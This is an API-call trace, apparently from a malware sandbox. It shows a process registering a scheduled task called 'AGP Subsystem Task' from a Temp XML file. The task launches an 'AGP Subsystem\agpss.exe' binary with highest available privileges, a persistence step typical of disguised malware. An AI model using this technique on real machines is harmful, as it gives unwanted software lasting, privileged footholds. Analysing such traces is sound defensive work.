[0170.457] lstrlenW (lpString="ed") returned 2
[0170.457] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.457] lstrlenW (lpString="xml") returned 3
[0170.457] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.457] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|ed|") returned 4
[0170.457] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|xml|") returned 5
[0170.457] lstrlenW (lpString="|ed|") returned 4
[0170.457] lstrlenW (lpString="|xml|") returned 5
[0170.457] SetLastError (dwErrCode=0x490)
[0170.457] lstrlenW (lpString="it") returned 2
[0170.457] lstrlenW (lpString="it") returned 2
[0170.457] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.457] lstrlenW (lpString="xml") returned 3
[0170.457] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.457] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|it|") returned 4
[0170.457] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|xml|") returned 5
[0170.457] lstrlenW (lpString="|it|") returned 4
[0170.457] lstrlenW (lpString="|xml|") returned 5
[0170.458] SetLastError (dwErrCode=0x490)
[0170.458] lstrlenW (lpString="et") returned 2
[0170.458] lstrlenW (lpString="et") returned 2
[0170.458] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.458] lstrlenW (lpString="xml") returned 3
[0170.458] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.458] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|et|") returned 4
[0170.458] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|xml|") returned 5
[0170.458] lstrlenW (lpString="|et|") returned 4
[0170.458] lstrlenW (lpString="|xml|") returned 5
[0170.458] SetLastError (dwErrCode=0x490)
[0170.458] lstrlenW (lpString="k") returned 1
[0170.458] lstrlenW (lpString="k") returned 1
[0170.458] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.458] lstrlenW (lpString="xml") returned 3
[0170.458] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.458] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|k|") returned 3
[0170.458] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|xml|") returned 5
[0170.458] lstrlenW (lpString="|k|") returned 3
[0170.458] lstrlenW (lpString="|xml|") returned 5
[0170.458] SetLastError (dwErrCode=0x490)
[0170.458] lstrlenW (lpString="du") returned 2
[0170.459] lstrlenW (lpString="du") returned 2
[0170.459] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.459] lstrlenW (lpString="xml") returned 3
[0170.459] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.459] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|du|") returned 4
[0170.459] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|xml|") returned 5
[0170.459] lstrlenW (lpString="|du|") returned 4
[0170.459] lstrlenW (lpString="|xml|") returned 5
[0170.459] SetLastError (dwErrCode=0x490)
[0170.459] lstrlenW (lpString="ri") returned 2
[0170.459] lstrlenW (lpString="ri") returned 2
[0170.459] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.459] lstrlenW (lpString="xml") returned 3
[0170.459] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.459] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|ri|") returned 4
[0170.459] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|xml|") returned 5
[0170.459] lstrlenW (lpString="|ri|") returned 4
[0170.459] lstrlenW (lpString="|xml|") returned 5
[0170.459] SetLastError (dwErrCode=0x490)
[0170.460] lstrlenW (lpString="z") returned 1
[0170.460] lstrlenW (lpString="z") returned 1
[0170.460] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.460] lstrlenW (lpString="xml") returned 3
[0170.460] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.460] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|z|") returned 3
[0170.460] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|xml|") returned 5
[0170.460] lstrlenW (lpString="|z|") returned 3
[0170.460] SetLastError (dwErrCode=0x490)
[0170.460] lstrlenW (lpString="f") returned 1
[0170.460] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.460] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.460] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|f|") returned 3
[0170.460] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|xml|") returned 5
[0170.460] SetLastError (dwErrCode=0x490)
[0170.460] lstrlenW (lpString="v1") returned 2
[0170.460] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.460] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.460] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|v1|") returned 4
[0170.460] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|xml|") returned 5
[0170.461] SetLastError (dwErrCode=0x490)
[0170.461] lstrlenW (lpString="xml") returned 3
[0170.461] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.461] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.461] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|xml|") returned 5
[0170.461] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|xml|") returned 5
[0170.461] StrStrIW (lpFirst="|xml|", lpSrch="|xml|") returned="|xml|"
[0170.461] SetLastError (dwErrCode=0x0)
[0170.461] SetLastError (dwErrCode=0x0)
[0170.461] lstrlenW (lpString="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmp17.tmp") returned 47
[0170.461] lstrlenW (lpString="-/") returned 2
[0170.461] StrChrIW (lpStart="-/", wMatch=0x43) returned 0x0
[0170.461] SetLastError (dwErrCode=0x490)
[0170.461] SetLastError (dwErrCode=0x490)
[0170.461] SetLastError (dwErrCode=0x0)
[0170.461] lstrlenW (lpString="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmp17.tmp") returned 47
[0170.461] StrChrIW (lpStart="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmp17.tmp", wMatch=0x3a) returned=":\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmp17.tmp"
[0170.461] lstrlenW (lpString="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmp17.tmp") returned 47
[0170.462] _memicmp (_Buf1=0x4f4cf0, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.462] _memicmp (_Buf1=0x4f4d20, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.462] SetLastError (dwErrCode=0x7a)
[0170.462] SetLastError (dwErrCode=0x0)
[0170.462] SetLastError (dwErrCode=0x0)
[0170.462] lstrlenW (lpString="C") returned 1
[0170.462] SetLastError (dwErrCode=0x490)
[0170.462] SetLastError (dwErrCode=0x0)
[0170.462] lstrlenW (lpString="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmp17.tmp") returned 47
[0170.462] lstrlenW (lpString="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmp17.tmp") returned 47
[0170.462] GetProcessHeap () returned 0x4e0000
[0170.462] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x60) returned 0x4f6a28
[0170.462] SetLastError (dwErrCode=0x0)
[0170.462] lstrlenW (lpString="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmp17.tmp") returned 47
[0170.462] SetLastError (dwErrCode=0x0)
[0170.462] GetProcessHeap () returned 0x4e0000
[0170.462] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x1fc) returned 0x4f6a90
[0170.463] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0
[0170.573] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0
[0170.623] CoCreateInstance (in: rclsid=0xeb230c*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x17, riid=0xeb20fc*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0x13d250 | out: ppv=0x13d250*=0x173e00) returned 0x0
[0170.635] TaskScheduler:ITaskService:Connect (This=0x173e00, serverName=0x13d1c0*(varType=0x8, wReserved1=0x0, wReserved2=0xd234, wReserved3=0x13, varVal1=0x0, varVal2=0x13db10), user=0x13d1d0*(varType=0x0, wReserved1=0x13, wReserved2=0xd258, wReserved3=0x13, varVal1=0x75419cde, varVal2=0x13db10), domain=0x13d1e0*(varType=0x0, wReserved1=0x0, wReserved2=0x1ec, wReserved3=0x0, varVal1=0xe, varVal2=0x0), password=0x13d1f0*(varType=0x0, wReserved1=0x0, wReserved2=0x9c39, wReserved3=0x7541, varVal1=0x6c, varVal2=0x13dc90)) returned 0x0
[0170.642] TaskScheduler:IUnknown:AddRef (This=0x173e00) returned 0x2
[0170.642] TaskScheduler:ITaskService:GetFolder (in: This=0x173e00, Path=0x0, ppFolder=0x13d2f4 | out: ppFolder=0x13d2f4*=0x173e68) returned 0x0
[0170.643] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmp17.tmp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\tmp17.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x5, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x110
[0170.644] GetFileSizeEx (in: hFile=0x110, lpFileSize=0x13cbe4 | out: lpFileSize=0x13cbe4*=1309) returned 1
[0170.644] ReadFile (in: hFile=0x110, lpBuffer=0x13cbec, nNumberOfBytesToRead=0x2, lpNumberOfBytesRead=0x13cbf4, lpOverlapped=0x0 | out: lpBuffer=0x13cbec*, lpNumberOfBytesRead=0x13cbf4*=0x2, lpOverlapped=0x0) returned 1
[0170.645] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
[0170.645] malloc (_Size=0x51e) returned 0x1724e8
[0170.645] ReadFile (in: hFile=0x110, lpBuffer=0x1724e8, nNumberOfBytesToRead=0x51e, lpNumberOfBytesRead=0x13cbf4, lpOverlapped=0x0 | out: lpBuffer=0x1724e8*, lpNumberOfBytesRead=0x13cbf4*=0x51d, lpOverlapped=0x0) returned 1
[0170.645] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x1724e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1310
[0170.645] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x1724e8, cbMultiByte=-1, lpWideCharStr=0x504fd4, cchWideChar=1310 | out: lpWideCharStr="\r\n\r\n \r\n \r\n \r\n \r\n InteractiveToken\r\n HighestAvailable\r\n \r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n \r\n false\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n false\r\n PT0S\r\n 4\r\n \r\n \r\n \r\n \"C:\\Program Files (x86)\\AGP Subsystem\\agpss.exe\"\r\n $(Arg0)\r\n \r\n \r\n") returned 1310
[0170.645] SysStringLen (param_1="\r\n\r\n \r\n \r\n \r\n \r\n InteractiveToken\r\n HighestAvailable\r\n \r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n \r\n false\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n false\r\n PT0S\r\n 4\r\n \r\n \r\n \r\n \"C:\\Program Files (x86)\\AGP Subsystem\\agpss.exe\"\r\n $(Arg0)\r\n \r\n \r\n") returned 0x51d
[0170.645] VarBstrCat (in: bstrLeft=0x0, bstrRight="\r\n\r\n \r\n \r\n \r\n \r\n InteractiveToken\r\n HighestAvailable\r\n \r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n \r\n false\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n false\r\n PT0S\r\n 4\r\n \r\n \r\n \r\n \"C:\\Program Files (x86)\\AGP Subsystem\\agpss.exe\"\r\n $(Arg0)\r\n \r\n \r\n", pbstrResult=0x13cb94 | out: pbstrResult=0x13cb94) returned 0x0
[0170.646] free (_Block=0x1724e8)
[0170.646] CloseHandle (hObject=0x110) returned 1
[0170.647] lstrlenW (lpString="") returned 0
[0170.647] malloc (_Size=0xc) returned 0x173ea8
[0170.647] SysStringLen (param_1="") returned 0x0
[0170.647] free (_Block=0x173ea8)
[0170.647] lstrlenW (lpString="") returned 0
[0170.648] ITaskFolder:RegisterTask (in: This=0x173e68, Path="AGP Subsystem Task", XmlText="\r\n\r\n \r\n \r\n \r\n \r\n InteractiveToken\r\n HighestAvailable\r\n \r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n \r\n false\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n false\r\n PT0S\r\n 4\r\n \r\n \r\n \r\n \"C:\\Program Files (x86)\\AGP Subsystem\\agpss.exe\"\r\n $(Arg0)\r\n \r\n \r\n", flags=6, UserId=0x13cbd0*(varType=0x8, wReserved1=0x0, wReserved2=0x4178, wReserved3=0x50, varVal1="", varVal2=0x504178), password=0x13cbe0*(varType=0x0, wReserved1=0x50, wReserved2=0x0, wReserved3=0x0, varVal1=0x13cc68, varVal2=0x76987526), LogonType=0, sddl=0x13cbf4*(varType=0x0, wReserved1=0x50, wReserved2=0x4178, wReserved3=0x50, varVal1=0x0, varVal2=0x0), ppTask=0x13cc54 | out: ppTask=0x13cc54*=0x173ed8) returned 0x0
[0170.761] GetProcessHeap () returned 0x4e0000
[0170.761] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x14) returned 0x4f5748
[0170.761] _memicmp (_Buf1=0x4f4c90, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.761] LoadStringW (in: hInstance=0x0, uID=0x12e, lpBuffer=0x4f6728, cchBufferMax=256 | out: lpBuffer="SUCCESS: The scheduled task \"%s\" has successfully been created.\n") returned 0x40
[0170.761] lstrlenW (lpString="SUCCESS: The scheduled task \"%s\" has successfully been created.\n") returned 64
[0170.761] GetProcessHeap () returned 0x4e0000
[0170.761] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x82) returned 0x504d58
[0170.761] _vsnwprintf (in: _Buffer=0x13cc60, _BufferCount=0x1fb, _Format="SUCCESS: The scheduled task \"%s\" has successfully been created.\n", _ArgList=0x13cc04 | out: _Buffer="SUCCESS: The scheduled task \"AGP Subsystem Task\" has successfully been created.\n") returned 80
[0170.761] _fileno (_File=0x754b2920) returned 1
[0170.761] _errno () returned 0x1707d8
[0170.761] _get_osfhandle (_FileHandle=1) returned 0x7
[0170.761] _errno () returned 0x1707d8
[0170.761] GetFileType (hFile=0x7) returned 0x2
[0170.762] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0170.762] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x13cbc8 | out: lpMode=0x13cbc8) returned 1
[0170.762] __iob_func () returned 0x754b2900
[0170.762] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0170.762] lstrlenW (lpString="SUCCESS: The scheduled task \"AGP Subsystem Task\" has successfully been created.\n") returned 80
[0170.763] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x13cc60*, nNumberOfCharsToWrite=0x50, lpNumberOfCharsWritten=0x13cbf0, lpReserved=0x0 | out: lpBuffer=0x13cc60*, lpNumberOfCharsWritten=0x13cbf0*=0x50) returned 1
[0170.763] IUnknown:Release (This=0x173ed8) returned 0x0
[0170.763] TaskScheduler:IUnknown:Release (This=0x173e68) returned 0x0
[0170.763] TaskScheduler:IUnknown:Release (This=0x173e00) returned 0x1
[0170.763] lstrlenW (lpString="") returned 0
[0170.763] lstrlenW (lpString="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmp17.tmp") returned 47
[0170.764] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmp17.tmp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 48
[0170.764] GetProcessHeap () returned 0x4e0000
[0170.764] GetProcessHeap () returned 0x4e0000
[0170.764] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f6a90) returned 1
[0170.764] GetProcessHeap () returned 0x4e0000
[0170.764] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f6a90) returned 0x1fc
[0170.764] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f6a90 | out: hHeap=0x4e0000) returned 1
[0170.764] GetProcessHeap () returned 0x4e0000
[0170.764] GetProcessHeap () returned 0x4e0000
[0170.764] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f6a28) returned 1
[0170.764] GetProcessHeap () returned 0x4e0000
[0170.764] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f6a28) returned 0x60
[0170.765] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f6a28 | out: hHeap=0x4e0000) returned 1
[0170.765] GetProcessHeap () returned 0x4e0000
[0170.765] GetProcessHeap () returned 0x4e0000
[0170.765] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f53a8) returned 1
[0170.765] GetProcessHeap () returned 0x4e0000
[0170.765] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f53a8) returned 0x16
[0170.765] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f53a8 | out: hHeap=0x4e0000) returned 1
[0170.765] GetProcessHeap () returned 0x4e0000
[0170.765] GetProcessHeap () returned 0x4e0000
[0170.765] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4ef060) returned 1
[0170.765] GetProcessHeap () returned 0x4e0000
[0170.765] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4ef060) returned 0x10
[0170.765] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4ef060 | out: hHeap=0x4e0000) returned 1
[0170.765] GetProcessHeap () returned 0x4e0000
[0170.765] GetProcessHeap () returned 0x4e0000
[0170.765] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f53c8) returned 1
[0170.765] GetProcessHeap () returned 0x4e0000
[0170.765] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f53c8) returned 0x14
[0170.765] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f53c8 | out: hHeap=0x4e0000) returned 1
[0170.765] GetProcessHeap () returned 0x4e0000
[0170.765] GetProcessHeap () returned 0x4e0000
[0170.766] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f6680) returned 1
[0170.766] GetProcessHeap () returned 0x4e0000
[0170.766] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f6680) returned 0xa0
[0170.766] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f6680 | out: hHeap=0x4e0000) returned 1
[0170.766] GetProcessHeap () returned 0x4e0000
[0170.766] GetProcessHeap () returned 0x4e0000
[0170.766] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f4c78) returned 1
[0170.766] GetProcessHeap () returned 0x4e0000
[0170.766] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f4c78) returned 0x10
[0170.766] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f4c78 | out: hHeap=0x4e0000) returned 1
[0170.766] GetProcessHeap () returned 0x4e0000
[0170.766] GetProcessHeap () returned 0x4e0000
[0170.766] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5288) returned 1
[0170.766] GetProcessHeap () returned 0x4e0000
[0170.766] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f5288) returned 0x14
[0170.766] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5288 | out: hHeap=0x4e0000) returned 1
[0170.766] GetProcessHeap () returned 0x4e0000
[0170.766] GetProcessHeap () returned 0x4e0000
[0170.767] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f69b8) returned 1
[0170.767] GetProcessHeap () returned 0x4e0000
[0170.767] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f69b8) returned 0x64
[0170.767] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f69b8 | out: hHeap=0x4e0000) returned 1
[0170.767] GetProcessHeap () returned 0x4e0000
[0170.767] GetProcessHeap () returned 0x4e0000
[0170.767] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f4d20) returned 1
[0170.767] GetProcessHeap () returned 0x4e0000
[0170.767] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f4d20) returned 0x10
[0170.767] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f4d20 | out: hHeap=0x4e0000) returned 1
[0170.767] GetProcessHeap () returned 0x4e0000
[0170.767] GetProcessHeap () returned 0x4e0000
[0170.767] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5248) returned 1
[0170.767] GetProcessHeap () returned 0x4e0000
[0170.767] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f5248) returned 0x14
[0170.767] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5248 | out: hHeap=0x4e0000) returned 1
[0170.767] GetProcessHeap () returned 0x4e0000
[0170.767] GetProcessHeap () returned 0x4e0000
[0170.767] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f4d08) returned 1
[0170.768] GetProcessHeap () returned 0x4e0000
[0170.768] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f4d08) returned 0xc
[0170.768] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f4d08 | out: hHeap=0x4e0000) returned 1
[0170.768] GetProcessHeap () returned 0x4e0000
[0170.768] GetProcessHeap () returned 0x4e0000
[0170.768] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f4cf0) returned 1
[0170.768] GetProcessHeap () returned 0x4e0000
[0170.768] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f4cf0) returned 0x10
[0170.768] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f4cf0 | out: hHeap=0x4e0000) returned 1
[0170.768] GetProcessHeap () returned 0x4e0000
[0170.768] GetProcessHeap () returned 0x4e0000
[0170.768] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5228) returned 1
[0170.768] GetProcessHeap () returned 0x4e0000
[0170.768] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f5228) returned 0x14
[0170.768] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5228 | out: hHeap=0x4e0000) returned 1
[0170.768] GetProcessHeap () returned 0x4e0000
[0170.768] GetProcessHeap () returned 0x4e0000
[0170.768] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5a90) returned 1
[0170.768] GetProcessHeap () returned 0x4e0000
[0170.768] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f5a90) returned 0x208
[0170.769] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5a90 | out: hHeap=0x4e0000) returned 1
[0170.769] GetProcessHeap () returned 0x4e0000
[0170.769] GetProcessHeap () returned 0x4e0000
[0170.769] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f4c18) returned 1
[0170.769] GetProcessHeap () returned 0x4e0000
[0170.769] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f4c18) returned 0x10
[0170.769] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f4c18 | out: hHeap=0x4e0000) returned 1
[0170.769] GetProcessHeap () returned 0x4e0000
[0170.769] GetProcessHeap () returned 0x4e0000
[0170.769] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f51e8) returned 1
[0170.769] GetProcessHeap () returned 0x4e0000
[0170.769] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f51e8) returned 0x14
[0170.769] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f51e8 | out: hHeap=0x4e0000) returned 1
[0170.769] GetProcessHeap () returned 0x4e0000
[0170.769] GetProcessHeap () returned 0x4e0000
[0170.769] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f6728) returned 1
[0170.769] GetProcessHeap () returned 0x4e0000
[0170.769] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f6728) returned 0x200
[0170.770] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f6728 | out: hHeap=0x4e0000) returned 1
[0170.770] GetProcessHeap () returned 0x4e0000
[0170.770] GetProcessHeap () returned 0x4e0000
[0170.770] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f4c90) returned 1
[0170.770] GetProcessHeap () returned 0x4e0000
[0170.770] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f4c90) returned 0x10
[0170.770] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f4c90 | out: hHeap=0x4e0000) returned 1
[0170.770] GetProcessHeap () returned 0x4e0000
[0170.770] GetProcessHeap () returned 0x4e0000
[0170.770] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5188) returned 1
[0170.770] GetProcessHeap () returned 0x4e0000
[0170.770] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f5188) returned 0x14
[0170.770] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5188 | out: hHeap=0x4e0000) returned 1
[0170.770] GetProcessHeap () returned 0x4e0000
[0170.770] GetProcessHeap () returned 0x4e0000
[0170.770] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5308) returned 1
[0170.770] GetProcessHeap () returned 0x4e0000
